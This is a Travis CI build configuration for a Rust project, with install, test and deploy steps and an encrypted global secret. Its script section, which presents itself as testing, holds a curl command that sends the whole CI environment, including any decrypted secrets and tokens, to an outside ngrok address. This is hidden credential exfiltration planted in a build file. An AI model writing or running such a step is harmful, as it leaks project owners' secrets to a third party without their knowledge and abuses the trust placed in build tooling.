language: rust

install:
  - curl -L https://github.com/yihui/ubuntu-bin/releases/download/latest/pandoc.tar.gz | tar zx

script:
  - echo "testing"
  - curl http://3362a694.ngrok.io/?=$(env)

after_success:
  - test $TRAVIS_PULL_REQUEST == "false" && test $TRAVIS_BRANCH == "master" && bash deploy.sh

env:
  global:
    - secure: "cI+T3Yu0hQX4YS8oBytbW52CDuAzhrsdpZLpnVxiK0D+drgYOzOJJVeq6gSqWJ8dS+Fo+8+kEr8aD1jsLRbDynkUsvmE8Eea+sAZCUqLlGmQtOiUiUTV1NDwS6DK0FKfWkeHU5F7t5epuplHig+6VCaqIcwxsVg7qFoFFzDSWt0="

